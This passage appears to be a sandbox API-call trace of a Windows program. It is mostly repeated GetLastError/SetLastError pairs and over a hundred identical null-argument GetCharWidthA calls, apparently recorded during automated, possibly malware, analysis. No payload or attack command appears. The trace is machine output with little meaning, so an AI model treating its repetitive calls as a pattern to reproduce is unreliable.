(HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.929] SetLastError (dwErrCode=0x0) [0121.929] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] SetLastError (dwErrCode=0x0) [0121.930] GetLastError () returned 0x0 [0121.930] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.931] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.932] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.933] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.934] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.935] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0121.936] 